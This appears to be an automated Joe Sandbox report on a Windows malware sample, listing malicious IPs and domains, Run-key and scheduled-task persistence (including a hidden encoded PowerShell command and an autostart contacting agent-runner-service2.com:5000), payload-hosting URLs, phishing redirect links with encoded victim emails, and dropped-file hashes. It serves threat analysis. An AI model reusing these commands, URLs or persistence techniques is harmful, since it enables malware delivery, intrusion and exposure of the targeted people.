https://login.vk.com/?act=login	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.9.91.71	unknown	Russian Federation	134121	RAINBOW-HKRainbownetworklimitedHK	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
87.240.132.78	vk.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
162.0.209.124	helleaa.com	Canada	35893	ACPCA	false
162.159.130.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
104.21.14.101	complaintsipzzx.shop	United States	13335	CLOUDFLARENETUS	true
92.122.104.90	steamcommunity.com	European Union	16625	AKAMAI-ASUS	true
147.45.47.59	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
104.21.16.74	writerospzm.shop	United States	13335	CLOUDFLARENETUS	true
194.58.114.223	unknown	Russian Federation	197695	AS-REGRU	false
104.21.47.141	celebratioopz.shop	United States	13335	CLOUDFLARENETUS	true
147.45.47.169	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
78.46.239.218	unknown	Germany	24940	HETZNER-ASDE	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
104.26.8.59	api.myip.com	United States	13335	CLOUDFLARENETUS	false
104.21.69.39	deallerospfosu.shop	United States	13335	CLOUDFLARENETUS	true
185.225.200.214	unknown	Russian Federation	42031	PLUSTELECOM-ASRU	false
95.164.44.107	agent-runner-service2.com	Gibraltar	29632	NASSIST-ASGI	false
188.114.97.3	yip.su	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	api.2ip.ua	European Union	13335	CLOUDFLARENETUS	true
104.21.73.43	mennyudosirso.shop	United States	13335	CLOUDFLARENETUS	true
38.180.132.96	arpdabl.zapto.org	United States	174	COGENT-174US	false
104.21.76.141	enfixxysdjsip.shop	United States	13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1491008
Start date and time:	2024-08-10 16:11:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	62
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.mine.winEXE@99/55@30/25
EGA Information:	Successful, ratio: 87.5%
HCA Information:	Successful, ratio: 92% Number of executed functions: 279 Number of non-executed functions: 85
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 40.68.123.157, 93.184.221.240, 20.242.39.171, 192.229.221.95, 13.85.23.206, 184.28.90.27, 20.190.159.68, 40.126.31.69, 20.190.159.2, 40.126.31.73, 20.190.159.75, 20.190.159.4, 40.126.31.67, 20.190.159.64, 20.42.65.92, 40.126.32.136, 20.190.160.20, 40.126.32.68, 40.126.32.134, 40.126.32.133, 20.190.160.17, 40.126.32.140, 40.126.32.138, 52.168.117.173, 142.250.186.170, 142.250.184.234, 142.250.185.170, 216.58.212.138, 142.250.185.74, 142.250.186.106, 142.250.186.138, 142.250.181.234, 172.217.18.106, 142.250.186.74, 142.250.186.42, 142.250.185.106, 142.250.184.202, 142.250.185.234, 216.58.212.170, 216.58.206.42, 216.58.206.46
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, www.googleapis.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, umwat
Execution Graph export aborted for target yqnvj2zXKAsCMyFmEDrQLSxi.exe, PID 2596 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:12:42	API Interceptor	2x Sleep call for process: svchost.exe modified
10:12:44	API Interceptor	1x Sleep call for process: mbnxbv_uftcj649iS9ilHBrA.exe modified
10:12:45	API Interceptor	3x Sleep call for process: MSBuild.exe modified
10:13:09	API Interceptor	35x Sleep call for process: bQnXcKn6ehLDJGqEStjbnSyC.exe modified
15:12:47	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run NetVoyager "C:\Program Files (x86)\NetVoyager\nv.exe" -run -s agent-runner-service2.com:5000
15:12:57	Task Scheduler	Run new task: blcDssXlHcdaeYcqZL path: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe s>ir /izdidOCe 525403 /S
15:13:42	Task Scheduler	Run new task: gJPjpAcCc path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
15:14:01	Task Scheduler	Run new task: TlnPngHIfWIiOSsBH path: C:\Windows\Temp\oOhzHqulPFgzVJsn\aQlMBDxnIMZAAVJ\LkNmcnN.exe s>HI /JmZbdidNi 525403 /S
15:14:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\b9fee9cd-36de-440b-8313-c516d192f44a\NjdbLPleIutA8FKI_S3fRztd.exe" --AutoStart
15:14:10	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\b9fee9cd-36de-440b-8313-c516d192f44a\NjdbLPleIutA8FKI_S3fRztd.exe s>--Task
15:14:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\b9fee9cd-36de-440b-8313-c516d192f44a\NjdbLPleIutA8FKI_S3fRztd.exe" --AutoStart

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.9.91.71	file.exe	Get hash	malicious	RedLine	Browse
147.45.44.104	5zFCjSBLvw.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	147.45.44.104/yuop/66b74f08ada90_shapr3D.exe
	FySc2FzpA8.exe	Get hash	malicious	Go Injector	Browse	147.45.44.104/prog/66af31c75d213_123p.exe
	66b0ba4420669_main.exe	Get hash	malicious	Vidar	Browse	147.45.44.104/steals/mine.exe
	66af531b832ee_main.exe	Get hash	malicious	Vidar	Browse	147.45.44.104/steals/mine.exe
	a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Get hash	malicious	Vidar	Browse	147.45.44.104/steals/mine.exe
	c1a96310dd45b906c51fd21fd604550225e1eec1941245850b24773e22768ad7_dump.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/steals/visior.exe
	setup.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/steals/visior.exe
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/steals/gfn1go.exe
87.240.132.78	http://vk.com/away.php?to=https%3A%2F%2Fclubechique.com.br%2Fsigndocumentworking%2Freviewandaligntoday%2Findex.php%3Fuserid%3DYWFyb25wQG1hc3Rlcm1vbGRsbGMuY29t	Get hash	malicious	Unknown	Browse	vk.com/away.php?to=https%3A%2F%2Fclubechique.com.br%2Fsigndocumentworking%2Freviewandaligntoday%2Findex.php%3Fuserid%3DYWFyb25wQG1hc3Rlcm1vbGRsbGMuY29t
	http://vk.com/away.php?to=https://suncrops.fr/old_site/jk/cz///i2tyrmi/JEHA@novozymes.com	Get hash	malicious	Unknown	Browse	vk.com/away.php?to=https://suncrops.fr/old_site/jk/cz///i2tyrmi/JEHA@novozymes.com
	http://vk.com/away.php?to=https%3a%2f%2fbwfldt.codesandbox.io/?bg=dmFsZXJ5QGNhc3VhbHRlay5jb20=	Get hash	malicious	HTMLPhisher	Browse	vk.com/away.php?to=https%3a%2f%2fbwfldt.codesandbox.io/?bg=dmFsZXJ5QGNhc3VhbHRlay5jb20=
	http://vk.com/away.php?to=http://ouk.voterstreams.sa.com/smith-nephew.com/c2NvdHQuaXJ2aW5Ac21pdGgtbmVwaGV3LmNvbQ==	Get hash	malicious	Unknown	Browse	away.vk.com/away.php
	http://vk.com/away.php?to=http://uio.doggoneknit.com/colt.net/a2VyaS5naWxkZXJAY29sdC5uZXQ=	Get hash	malicious	Unknown	Browse	away.vk.com/away.php
	ITSBi3J3ws.exe	Get hash	malicious	RedLine, SmokeLoader, Tofsee	Browse	vk.com/
	QQNkZaudJn.exe	Get hash	malicious	RedLine, SmokeLoader, Tofsee	Browse	vk.com/
	file.exe	Get hash	malicious	CryptOne, Djvu, RedLine, SmokeLoader	Browse	vk.com/
	09d9bb25f1d1bd6f7c3e3aa64df49eaa398e9f26b198e.exe	Get hash	malicious	RedLine, SmokeLoader, Tofsee	Browse	vk.com/
	file.exe	Get hash	malicious	CryptOne, Djvu, SmokeLoader, Tofsee	Browse	vk.com/
162.0.209.124	file.exe	Get hash	malicious	Amadey, SystemBC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
yip.su	file.exe	Get hash	malicious	DarkTortilla	Browse	188.114.96.3
	file.exe	Get hash	malicious	DarkTortilla, Neoreklami	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Inject5.6732.13710.8794.exe	Get hash	malicious	Cryptbot, Neoreklami	Browse	188.114.97.3
	yLfAxBEcuo.exe	Get hash	malicious	Cryptbot, Vidar, Xmrig	Browse	188.114.97.3
	8998BC9FAF52DAB072698E932593819BFD772EE5C0C4519F30ECD55DE363505A.exe	Get hash	malicious	Bdaejec	Browse	188.114.96.3
	file.exe	Get hash	malicious	Amadey, Glupteba	Browse	104.21.79.77
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	104.21.79.77
	LIRR4A0xzv.exe	Get hash	malicious	Amadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	172.67.169.89
	dl7WL77rkA.exe	Get hash	malicious	Glupteba, Mars Stealer, Stealc, Vidar	Browse	172.67.169.89
	sTsbAmON9u.exe	Get hash	malicious	LummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, Xmrig	Browse	172.67.169.89
helsinki-dtc.com	file.exe	Get hash	malicious	DarkTortilla, Neoreklami	Browse	194.67.87.38
	Install.exe	Get hash	malicious	Neoreklami	Browse	194.67.87.38
	setup.exe	Get hash	malicious	Neoreklami	Browse	194.67.87.38
	Install.exe	Get hash	malicious	Neoreklami	Browse	194.67.87.38
	setup.exe	Get hash	malicious	Neoreklami	Browse	194.67.87.38
	file.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	194.67.87.38
	setup.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, RedLine, Stealc, Stealerium, Vidar	Browse	194.67.87.38
	setup.exe	Get hash	malicious	Neoreklami	Browse	194.67.87.38
	1720605557.036432_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, Socks5Systemz, Stealc, Stealerium, Vidar	Browse	194.67.87.38
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	194.67.87.38
agent-runner-service2.com	file.exe	Get hash	malicious	Unknown	Browse	95.164.44.107
agent-runner-service2.com	pRwcU0GoAh.exe	Get hash	malicious	Unknown	Browse	95.164.44.107
celebratioopz.shop	66b74f08ada90_shapr3D.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.47.141
	5zFCjSBLvw.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.47.141
	SecuriteInfo.com.Trojan.InjectNET.17.12466.260.exe	Get hash	malicious	LummaC	Browse	104.21.47.141
	SecuriteInfo.com.Trojan.InjectNET.17.9745.22419.exe	Get hash	malicious	LummaC	Browse	104.21.47.141
	file.exe	Get hash	malicious	LummaC	Browse	104.21.47.141
	file.exe	Get hash	malicious	LummaC	Browse	172.67.171.80

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VKONTAKTE-SPB-AShttpvkcomRU	https://urlz.fr/rBgs	Get hash	malicious	Unknown	Browse	87.240.137.164
	https://cu69001.tw1.ru/doumgba/pages/region.php	Get hash	malicious	Unknown	Browse	93.186.225.194
	http://rewwerds-ff-garena.ru/	Get hash	malicious	Unknown	Browse	87.240.129.133
	http://rewwerds-ff-garena.ru/freefire/	Get hash	malicious	Unknown	Browse	87.240.132.67
	http://files.fm/u/stdpwqvw9s	Get hash	malicious	Unknown	Browse	87.240.132.78
	http://roxbro.wallst.ru/	Get hash	malicious	Unknown	Browse	87.240.129.133
	https://twiliosendgrid93598157.vk.com/away.php?to=%68%74%74%70%73%3A%2F%2F%70%75%62%2D%63%32%33%38%61%66%32%31%65%32%39%34%34%33%63%32%61%33%66%37%35%32%33%65%39%37%31%63%65%36%34%33%2E%72%32%2E%64%65%76%2F%73%65%6E%64%67%72%69%64%2E%68%74%6D%6C%23c2VhbkB2aXJ0dWFsaW50ZWxsaWdlbmNlYnJpZWZpbmcuY29t	Get hash	malicious	Unknown	Browse	87.240.132.67
	https://zjnlm.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=radiouserdadambato.com/dayo/vwxmp/c2N1bWluZ3NAdG1oY2MuY29t	Get hash	malicious	HTMLPhisher	Browse	93.186.225.194
	https://2m0bi.vk.com/away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=aptitude.webappmate.in/dayo/yyfzw/bmNhcnJAdmlyZ2luaWFob3NwaXRhbGNlbnRlci5jb20=$%C3%A3%E2%82%AC%E2%80%9A	Get hash	malicious	Unknown	Browse	87.240.129.133
	https://pybu8.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=1844forezcash.com/bin/kpm/sf_rand_string_lowercase(6)/sf_base64_encode/YmxhQGJsYS5jb20=	Get hash	malicious	HTMLPhisher	Browse	93.186.225.194
CLOUDFLARENETUS	IMPORT PO2024-0961 ASTG.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	66b74f08ada90_shapr3D.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.158.159
	5zFCjSBLvw.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.74
	SecuriteInfo.com.BackDoor.AgentTeslaNET.12.29781.10988.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	FBS2024000000392.docx.doc	Get hash	malicious	Unknown	Browse	172.67.162.208
	2fc214327d8e0c9782386edac75d16fd9c3d37ae5919f.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Payment Receipt.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.164.124
	FBS2024000000392.docx.doc	Get hash	malicious	Unknown	Browse	172.67.162.208
RAINBOW-HKRainbownetworklimitedHK	file.exe	Get hash	malicious	RedLine	Browse	45.9.91.71
	eb63qL3NvD.elf	Get hash	malicious	Unknown	Browse	85.239.34.37
	tSxLFHbmpL.elf	Get hash	malicious	Unknown	Browse	85.239.34.37
	gu6ccxOYNV.elf	Get hash	malicious	Mirai	Browse	85.239.34.37
	8IhzjuA6Fx.elf	Get hash	malicious	Unknown	Browse	85.239.34.37
	ezLHh4bDkz.elf	Get hash	malicious	Unknown	Browse	85.239.34.37
	8WuZBTfiu6.elf	Get hash	malicious	Unknown	Browse	85.239.34.37
	TggxYOtzlJ.elf	Get hash	malicious	Unknown	Browse	85.239.34.37
	7zt8zkpfA8.elf	Get hash	malicious	Unknown	Browse	85.239.34.37
	Notion 4.3.4.zip	Get hash	malicious	Unknown	Browse	191.96.53.165
FREE-NET-ASFREEnetEU	5zFCjSBLvw.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	147.45.44.104
	file.exe	Get hash	malicious	Amadey, Cryptbot, Neoreklami, PureLog Stealer, RedLine, Stealc, Vidar	Browse	147.45.60.44
	file.exe	Get hash	malicious	DarkTortilla, Neoreklami	Browse	147.45.60.44
	SecuriteInfo.com.Trojan.InjectNET.17.3445.31574.exe	Get hash	malicious	Unknown	Browse	147.45.44.138
	SecuriteInfo.com.Trojan.InjectNET.17.30163.22147.exe	Get hash	malicious	Unknown	Browse	147.45.44.131
	SecuriteInfo.com.Trojan.InjectNET.17.12466.260.exe	Get hash	malicious	LummaC	Browse	147.45.44.131
	SecuriteInfo.com.Trojan.InjectNET.17.30163.22147.exe	Get hash	malicious	Unknown	Browse	147.45.44.131
	SecuriteInfo.com.Trojan.InjectNET.17.9745.22419.exe	Get hash	malicious	LummaC	Browse	147.45.44.131
	SecuriteInfo.com.Trojan.TR.Dropper.Gen.31130.17125.exe	Get hash	malicious	Quasar	Browse	147.45.44.138
	SecuriteInfo.com.Trojan.InjectNET.17.20520.10316.exe	Get hash	malicious	LummaC	Browse	147.45.44.131
ACPCA	file.exe	Get hash	malicious	Amadey, SystemBC	Browse	162.0.209.124
	45.66.231.213-mipsel-2024-08-09T11_47_09.elf	Get hash	malicious	Unknown	Browse	162.16.176.107
	z4Nuevalistaadjunta.exe	Get hash	malicious	DBatLoader, FormBook	Browse	162.0.213.72
	709282738372873.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	64MXEd79F1.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	45.66.231.148-mipsel-2024-07-30T12_25_27.elf	Get hash	malicious	Unknown	Browse	162.52.209.83
	Quote - V-24-TOS-082.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	Employee performance.exe	Get hash	malicious	FormBook	Browse	162.0.209.131
	5DoEwwn6p2.elf	Get hash	malicious	Mirai	Browse	162.9.87.0
	iUAAvj0XNL.elf	Get hash	malicious	Mirai	Browse	162.52.42.38

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	66b74f08ada90_shapr3D.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.47.141 104.21.14.101 188.114.97.3 92.122.104.90 34.117.59.81 188.114.96.3 104.21.73.43 104.26.8.59 104.21.69.39 104.21.76.141
	5zFCjSBLvw.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.47.141 104.21.14.101 188.114.97.3 92.122.104.90 34.117.59.81 188.114.96.3 104.21.73.43 104.26.8.59 104.21.69.39 104.21.76.141
	file.exe	Get hash	malicious	LummaC	Browse	104.21.47.141 104.21.14.101 188.114.97.3 92.122.104.90 34.117.59.81 188.114.96.3 104.21.73.43 104.26.8.59 104.21.69.39 104.21.76.141
	FBS2024000000392.docx.doc	Get hash	malicious	Unknown	Browse	104.21.47.141 104.21.14.101 188.114.97.3 92.122.104.90 34.117.59.81 188.114.96.3 104.21.73.43 104.26.8.59 104.21.69.39 104.21.76.141
	file.exe	Get hash	malicious	LummaC	Browse	104.21.47.141 104.21.14.101 188.114.97.3 92.122.104.90 34.117.59.81 188.114.96.3 104.21.73.43 104.26.8.59 104.21.69.39 104.21.76.141
	FedEx_AWB# 777187550711.xls	Get hash	malicious	Unknown	Browse	104.21.47.141 104.21.14.101 188.114.97.3 92.122.104.90 34.117.59.81 188.114.96.3 104.21.73.43 104.26.8.59 104.21.69.39 104.21.76.141
	MT103.xls	Get hash	malicious	Unknown	Browse	104.21.47.141 104.21.14.101 188.114.97.3 92.122.104.90 34.117.59.81 188.114.96.3 104.21.73.43 104.26.8.59 104.21.69.39 104.21.76.141
	MDI-Emissions-Estimator-2024.xls	Get hash	malicious	Unknown	Browse	104.21.47.141 104.21.14.101 188.114.97.3 92.122.104.90 34.117.59.81 188.114.96.3 104.21.73.43 104.26.8.59 104.21.69.39 104.21.76.141
	SecuriteInfo.com.Trojan.InjectNET.17.12466.260.exe	Get hash	malicious	LummaC	Browse	104.21.47.141 104.21.14.101 188.114.97.3 92.122.104.90 34.117.59.81 188.114.96.3 104.21.73.43 104.26.8.59 104.21.69.39 104.21.76.141
	SecuriteInfo.com.Trojan.InjectNET.17.9745.22419.exe	Get hash	malicious	LummaC	Browse	104.21.47.141 104.21.14.101 188.114.97.3 92.122.104.90 34.117.59.81 188.114.96.3 104.21.73.43 104.26.8.59 104.21.69.39 104.21.76.141
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	Vidar	Browse	78.46.239.218
	file.exe	Get hash	malicious	Vidar	Browse	78.46.239.218
	file.exe	Get hash	malicious	Vidar	Browse	78.46.239.218
	file.exe	Get hash	malicious	Vidar	Browse	78.46.239.218
	FE89Nae47k.exe	Get hash	malicious	Vidar	Browse	78.46.239.218
	66b0ba4420669_main.exe	Get hash	malicious	Vidar	Browse	78.46.239.218
	66b09f01e0030_dozkey.exe	Get hash	malicious	Vidar	Browse	78.46.239.218
	lem.exe	Get hash	malicious	Vidar	Browse	78.46.239.218
	48DhuEoTcX.exe	Get hash	malicious	Metasploit, Meterpreter	Browse	78.46.239.218
	66af531b832ee_main.exe	Get hash	malicious	Vidar	Browse	78.46.239.218
37f463bf4616ecd445d4a1937da06e19	FBS2024000000392.docx.doc	Get hash	malicious	Unknown	Browse	142.250.185.193 162.159.130.233 92.122.104.90 188.114.96.3 54.210.117.250 87.240.132.78 162.0.209.124
	ndGmwWXGOn.hta	Get hash	malicious	Cobalt Strike, GuLoader, Remcos	Browse	142.250.185.193 162.159.130.233 92.122.104.90 188.114.96.3 54.210.117.250 87.240.132.78 162.0.209.124
	file.exe	Get hash	malicious	Amadey, SystemBC	Browse	142.250.185.193 162.159.130.233 92.122.104.90 188.114.96.3 54.210.117.250 87.240.132.78 162.0.209.124
	file.exe	Get hash	malicious	DarkTortilla, Neoreklami	Browse	142.250.185.193 162.159.130.233 92.122.104.90 188.114.96.3 54.210.117.250 87.240.132.78 162.0.209.124
	sahost.exe	Get hash	malicious	GuLoader	Browse	142.250.185.193 162.159.130.233 92.122.104.90 188.114.96.3 54.210.117.250 87.240.132.78 162.0.209.124
	IEexplore.hta	Get hash	malicious	Cobalt Strike, GuLoader	Browse	142.250.185.193 162.159.130.233 92.122.104.90 188.114.96.3 54.210.117.250 87.240.132.78 162.0.209.124
	SecuriteInfo.com.Win32.MalwareX-gen.27910.19137.exe	Get hash	malicious	Unknown	Browse	142.250.185.193 162.159.130.233 92.122.104.90 188.114.96.3 54.210.117.250 87.240.132.78 162.0.209.124
	SecuriteInfo.com.Win32.MalwareX-gen.27910.19137.exe	Get hash	malicious	Unknown	Browse	142.250.185.193 162.159.130.233 92.122.104.90 188.114.96.3 54.210.117.250 87.240.132.78 162.0.209.124
	file.exe	Get hash	malicious	Vidar	Browse	142.250.185.193 162.159.130.233 92.122.104.90 188.114.96.3 54.210.117.250 87.240.132.78 162.0.209.124
	file.exe	Get hash	malicious	Vidar	Browse	142.250.185.193 162.159.130.233 92.122.104.90 188.114.96.3 54.210.117.250 87.240.132.78 162.0.209.124

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\DHDAFBFCFHID\freebl3.dll	file.exe	Get hash	malicious	Amadey, Cryptbot, Neoreklami, PureLog Stealer, RedLine, Stealc, Vidar	Browse
	wqOq2pxuQB.exe	Get hash	malicious	Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.20423.9863.exe	Get hash	malicious	Amadey, PureLog Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	Setup.exe	Get hash	malicious	Go Injector, Stealc, Vidar	Browse
	FE89Nae47k.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.8387.16538.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
C:\Program Files (x86)\NetVoyager\nv.exe	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\NetVoyager\nv.dat

Download File

Process:	C:\Program Files (x86)\NetVoyager\nv.exe
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:Vjre1:o
MD5:	D59814B688D3265A22978EC72367E076
SHA1:	D891901C53622F187C12A8A78269D533E168B71D
SHA-256:	E1B6720104FDA174CDF53B4FDA426BA9C99C6F0FAC7F71862CC305C9B7B609C3
SHA-512:	8040E2F550F6A833B8BC78588963859217D654ABF474571E899F9C65706FE77A152FA94116A2588EA7E5EAD9CC8D1F8B436A52760E5F8BBDDE8DCDFC63B045F0
Malicious:	false
Preview:	...7...Nh.+[."*.

C:\Program Files (x86)\NetVoyager\nv.exe

Download File

Process:	C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	3097600
Entropy (8bit):	6.278586127519849
Encrypted:	false
SSDEEP:	49152:u2LuWAXniueagRswaRfZ/G+eUmOpw80D:uWta28AOpw
MD5:	BA027CCB7DE0F4A3769F48136D183DBD
SHA1:	A7CDD10733D1064A143001DE087F0565AE116E0B
SHA-256:	4CB86D1B9775321A7F8ED4F751E3ECE271402E0BE07070F72E68DF038877DC8E
SHA-512:	331B6311E44E74D0EB4DF9718F0DFB9E79453ECA26677C53E8E6BC76F2A3633ECBE60119AB07702A9ECE7747D86ABFD6D6201081F21E59920D2CA48D6436A7F8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........+..................6......@.............@...........................0...............................................-.r....................................................................................................................text...-...........................`..`.data....j.......6..................@.../4...........@.........................B/18..........P.........................B/30.........0 ........................B/43...........!......T ................B/59.....$2...."..4...2!................B/75.....7.....#......f"................B/94.....Q,....#......h"................B/106.....a... -..b....+................B.idata..r.....-.......+.............@....symtab..F....-..H....+................B................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\AEGDBA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
